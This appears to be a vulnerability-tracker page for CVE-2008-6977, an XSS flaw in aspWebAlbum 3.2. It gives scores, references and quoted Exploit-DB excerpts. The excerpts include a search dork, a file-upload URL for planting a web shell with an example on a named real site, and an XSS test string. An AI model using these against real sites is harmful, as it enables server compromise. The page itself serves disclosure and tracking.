CVE-2008-6977
published 2009-08-19CVE-2008-6977: Cross-site scripting (XSS) vulnerability in album.asp in Full Revolution aspWebAlbum 3.2 allows remote attackers to inject arbitrary web script or HTML via the…
PriorityP419medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.75%
75.0th percentile
Cross-site scripting (XSS) vulnerability in album.asp in Full Revolution aspWebAlbum 3.2 allows remote attackers to inject arbitrary web script or HTML via the message parameter in a summary action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| fullrevolution | aspwebalbum | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
aspwebalbum 3.2 - Multiple Vulnerabilities
exploitdb·2008-09-10
CVE-2008-6978 aspwebalbum 3.2 - Multiple Vulnerabilities
aspwebalbum 3.2 - Multiple Vulnerabilities
---
#################################################################################################
#
#-# Discovered by Alemin_Krali #
#
#-# aspWebAlbum 3.2 #
#
#-# Script Download "http://www.fullrevolution.com" #
#
#-# aspWebAlbum 3.2 Single Site License | $60.00 : ) #
#
#-# HomePage al3m.blogspot.com #
#
#-# [email protected] #
#
#-# Dork ? : album.asp?pic= .jpg cat= #
#
#
#
#--# 1-Arbitrary File Upload Exploit [AspWebAlbum All Versions] #
#
http://www.site.com/path/album.asp?action=uploadmedia&cat=Real Category Name! #
#
and your shell adress: #
#
http://www.site.com/path/album/categories/Real Category Name!/pics/yourshell.asp #
#
#
ex:1 #
http://www.assisteurope.net/album/categories/Beslan%202005/Memorials/pics/cyberspy.asp #
#
ex:2
Exploit-DB
aspwebalbum 3.2 - Arbitrary File Upload / SQL Injection / Cross-Site Scripting
exploitdb·2008-09-03
CVE-2008-6978 aspwebalbum 3.2 - Arbitrary File Upload / SQL Injection / Cross-Site Scripting
aspwebalbum 3.2 - Arbitrary File Upload / SQL Injection / Cross-Site Scripting
---
##################################################################################################
#
#-# Discovered bay Alemin_Krali alert('xss')&from=login #
#
#################################################################################################
# milw0rm.com [2008-09-03]
No writeups or analysis indexed.
http://osvdb.org/47915http://secunia.com/advisories/31649http://www.securityfocus.com/bid/30996https://exchange.xforce.ibmcloud.com/vulnerabilities/44878https://www.exploit-db.com/exploits/6357https://www.exploit-db.com/exploits/6420http://osvdb.org/47915http://secunia.com/advisories/31649http://www.securityfocus.com/bid/30996https://exchange.xforce.ibmcloud.com/vulnerabilities/44878https://www.exploit-db.com/exploits/6357https://www.exploit-db.com/exploits/6420
2009-08-19
Published